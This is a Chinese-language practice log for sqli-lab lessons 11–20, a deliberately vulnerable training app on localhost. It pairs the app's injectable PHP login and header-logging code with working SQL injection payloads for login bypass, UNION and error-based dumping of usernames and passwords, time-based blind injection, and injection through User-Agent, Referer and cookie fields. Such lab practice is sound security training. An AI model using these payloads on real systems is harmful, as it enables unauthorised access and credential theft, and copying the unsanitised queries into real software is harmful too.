SQLI-LAB 的 实战记录(Less 11 - Less 20)

以下内容 只是本人在做 sqli-lab 练习时 写下的记录，仅供参考。
因为本人学过一些 sql注入 的内容，所以大部分内容是没有讲解的，如有不清楚的地方，请自行使用搜索引擎查询，相信会得到所需的内容。

Less - 11 Error Based- String

（第11课：基于错误 - 字符型）

Test:

    http://localhost/sqli-lab/Less-11/index.php        uname=' &passwd=' &submit=Submit

注：这个是报错的。
建议用火狐浏览器的HackBar或者Burp来做测试
POST 格式 是用 Burp 截的，其实变量名可以直接右键看网页的源代码。
听说过万能密码么？可以考虑使用

Sourse Code：

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){    echo 'Your Login name:'. $row['username'];    echo 'Your Password:' .$row['password'];    echo '<img src="../images/flag.jpg"  />';   }else{    print_r(mysql_error());    echo '<img src="../images/slap.jpg" />';   }

Solution：

    uname= ' or '1'='1 &passwd=  ' or '1'='1 &submit=Submit    uname= ' or 1=1 --+ &passwd= ' or 1=1 --+ &submit=Submit    uname= ' or 1=1 # &passwd= ' or 1=1 # &submit=Submit     其它：    uname= ' union select database(),6  --+ &passwd= ' union select database(),6  --+ &submit=Submit    uname= ' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 --+ &passwd= '  --+ &submit=Submit    uname= ' union select (select group_concat(username) from security.users),6 --+ &passwd= '  --+ &submit=Submit

---

Less - 12 Error Based- Double quotes- String

（第12课：基于错误 - 双引号 - 字符串）

Test：

    http://localhost/sqli-lab/Less-12/index.php        uname= ") &passwd= " &submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”) and password=(” ” “) LIMIT 0,1’ at line 1
注：直接就指出了 $uname和$passwd 周围是双引号和一层括号

Sourse Code：

$uname='"'.$uname.'"';$passwd='"'.$passwd.'"';@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){    echo 'Your Login name:'. $row['username'];    echo 'Your Password:' .$row['password'];    echo '<img src="../images/flag.jpg"   />';   }else{    print_r(mysql_error());    echo '<img src="../images/slap.jpg"   />';   }

Solution：

    uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit     uname= ") or 1=1 # &passwd= ") or 1=1 # &submit=Submit     其它：    uname= ") union select database(),6 # &passwd= ") or 1=1 # &submit=Submit    uname= ") union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),6 # &passwd= ") or 1=1 # &submit=Submit    uname= ") union select (select group_concat(username) from security.users),6 # &passwd= ") or 1=1 # &submit=Submit

---

Less - 13 Double Injection- String- with twist

（第13课：双注入 - 字符型 - 变形）

Test：

    http://localhost/sqli-lab/Less-13/index.php        uname= 0' &passwd= 0' &submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘0’ ‘) LIMIT 0,1’ at line 1
注：直接就指出了 $uname和$passwd 周围是单引号和一层括号

Sourse Code：

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){    echo '<img src="../images/flag.jpg"   />';   }else{    print_r(mysql_error());    echo '<img src="../images/slap.jpg"   />';   }

Solution：

    uname= ') or ('1')=('1 &passwd= ') or ('1')=('1 &submit=Submit    uname= ') or 1=1 # &passwd= ') or 1=1 # &submit=Submit     其它：    uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit    uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit    uname= ') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit    uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit    uname= ') union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit    uname= ') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit    uname= ') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

---

Less - 14 Double Injection- Double quotes- String

（第14课：双注入 - 双引号 - 字符串）

Test：

    http://localhost/sqli-lab/Less-14/index.php        uname= "&passwd=' &submit=Submit

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” ” LIMIT 0,1’ at line 1
注：能看出 $uname和$passwd 周围只有双引号

Sourse Code：

    $uname='"'.$uname.'"';    $passwd='"'.$passwd.'"';    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";    $result=mysql_query($sql);    $row = mysql_fetch_array($result);    if($row){        echo '<img src="../images/flag.jpg" />';       }else{        print_r(mysql_error());        echo '<img src="../images/slap.jpg"  />';       }

Solution：

    uname= " or "1"="1&passwd=" or "1"="1 &submit=Submit     uname=" or 1=1 --+&passwd=" or 1=1 --+&submit=Submit     uname=" or 1=1 #&passwd=" or 1=1 #&submit=Submit     其它：     uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit    uname= " union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit    uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit    uname= " union select 1,2 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit    uname= " union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit    uname= " union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

---

Less - 15 Blind- Boolian Based- String

（第15课：盲注 - 基于布尔值 - 字符串）

Test：

    http://localhost/sqli-lab/Less-15/index.php        uname="  or 1=1 # &passwd=" or 1=1 # &submit=Submit        uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit

注：第一个错了，第二个对了，被单引号包围，没有回显，考虑盲注。

Sourse Code：

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){        echo '<img src="../images/flag.jpg"  />';   }else{        echo '<img src="../images/slap.jpg"   />';   }

Solution：

    uname=' or '1'='1 &passwd=' or '1'='1 &submit=Submit     uname=' or 1=1 #&passwd=' or 1=1 #&submit=Submit     其它：     uname=' or (length(database())) = 8 #&passwd=' or 1=1 #&submit=Submit     uname=' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submit

---

Less - 16 Blind- Time Based- Double quotes- String

（第16课：盲注 - 基于时间 - 双引号 - 字符串）

Test：

    http://localhost/sqli-lab/Less-16/index.php        uname=' or 1=1 # &passwd=' or 1=1 #&submit=Submit        uname=") or 1=1 # &passwd=") or 1=1 # &submit=Submit

注：第一个错了，第二个对了，被双引号包围，没有回显，考虑盲注。
它的回显图片暴露了对错，所以是基于布尔值或是基于时间都行。

Sourse Code：

$uname='"'.$uname.'"';$passwd='"'.$passwd.'"'; @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){    echo '<img src="../images/flag.jpg"  />';   }else{    echo '<img src="../images/slap.jpg"  />';     }

Solution：

    uname=") or ("1")=("1 &passwd=") or ("1")=("1 &submit=Submit     uname=") or 1=1 or if(1=1, sleep(1), null)  #&passwd=") or 1=1 #&submit=Submit     其它：     uname=") or (length(database())) = 8 #&passwd=") or 1=1 #&submit=Submit     uname=") or (ascii(substr((select database()) ,1,1))) = 115  or if(1=1, sleep(1), null)  #&passwd=") or 1=1 #&submit=Submit

---

Less - 17 Update Query- Error based - String

（第17课：更新查询 - 基于错误 - 字符串）

Test：

    http://localhost/sqli-lab/Less-17/index.php

注：标题是密码重置，输入框就一个用户名，一个新密码，猜对用户名就好

Sourse Code：

$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){    $row1 = $row['username'];         $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";    mysql_query($update);    if (mysql_error()){        print_r(mysql_error());    }else{    }    echo '<img src="../images/flag1.jpg"   />';   }else{    echo '<img src="../images/slap1.jpg"   />';}

注：对 $uname和$passwd字段有检查

Solution：

     uname=admin&passwd=666&submit=Submit     其它：          uname=Dumb&passwd=666&submit=Submit          uname=Angelina&passwd=666&submit=Submit          uname=secure&passwd=666&submit=Submit

---

Less - 18 Header Injection- Error Based- string

（第18课： 头部注入 - 基于错误 - 字符串）

Test：

    http://localhost/sqli-lab/Less-18/index.php        uname=admin&passwd=admin&submit=Submit

Your IP ADDRESS is: 127.0.0.1
Your User Agent is: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
注：建议使用火狐的Modify Headers 或 Burp 修改 user-agent的值
已经将上一次练习中动过的 数据库的值改回来了。

Sourse Code：

$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";    mysql_query($insert);    echo 'Your User Agent is: ' .$uagent;    print_r(mysql_error());               echo '<img src="../images/flag.jpg"  />';}else{    print_r(mysql_error());    echo '<img src="../images/slap.jpg"   />';   }

注：对 $uname和$passwd字段有检查

Solution：

    ' or '1' = '1     其它：         ' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1

注：以上是user agent 的值，基于时间的盲注，如果不对会延时5s

---

Less - 19 Header Injection- Referer- Error Based- string

（第19课：头部注入 - Referer字段 - 基于错误- 字符串 ）

Test：

     http://localhost/sqli-lab/Less-19/index.php         uname=admin&passwd=admin&submit=Submit

Your IP ADDRESS is: 127.0.0.1
Your Referer is:
注：建议使用火狐的Modify Headers 或 Burp 修改 referer的值

Sourse Code：

$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){        $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";        mysql_query($insert);        echo 'Your Referer is: ' .$uagent;        print_r(mysql_error());                   echo '<img src="../images/flag.jpg" />';}else{        print_r(mysql_error());        echo '<img src="../images/slap.jpg"  />';   } 

注：对 $uname和$passwd字段有检查

Solution：

    ' or '1' = '1    其它：        ' or (length(database())) = 8 or if(1=1, sleep(5), null) or '1' = '1

注：以上是referer 的值，基于时间的盲注，如果不对，会延时5s

---

Less - 20 POST - Cookie injections - Uagent field - error based

（第20课：POST – cookie 注入 - Uagent字段 - 基于错误）

Test：

     http://localhost/sqli-lab/Less-20/index.php         uname=Dumb&passwd=Dumb&submit=Submit

注：先登录，比如你知道一个账号 uname：Dumb，pwd：Dumb
登录以后会显示用户名 密码 Id cookie IP地址 User Agent。
可以使用火狐浏览器的Firebug来修改cookie中$uname的值。
记得把过期时间也改了，不然刚改完$uname的值，cookie就过期了。。。

Sourse Code：

无cookie时 登录部分$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);$cookee = $row1['username'];if($row1){    setcookie('uname', $cookee, time()+3600);       header ('Location: index.php');    print_r(mysql_error());               echo '<img src="../images/flag.jpg" />';}else{    print_r(mysql_error());    echo '<img src="../images/slap.jpg" />';   }有cookie时 登录部分$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600; echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];           echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";$result=mysql_query($sql);if (!$result){   die('Issue with your mysql: ' . mysql_error());}$row = mysql_fetch_array($result);if($row){    echo 'Your Login name:'. $row['username'];    echo 'Your Password:' .$row['password'];    echo 'Your ID:' .$row['id'];}else{       echo '<img src="../images/slap1.jpg" />';}

注：对 $uname和$passwd字段有检查，有cookie时 从数据库中显示的数据是 username、password和id

Solution：

    Dumb ' or 1=1 #     其它：         ' union select 1,database(),6 or 1=1 #         ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+         ' union select 1,group_concat(username),group_concat(password) from security.users  #

注：以上是cookie中uname的值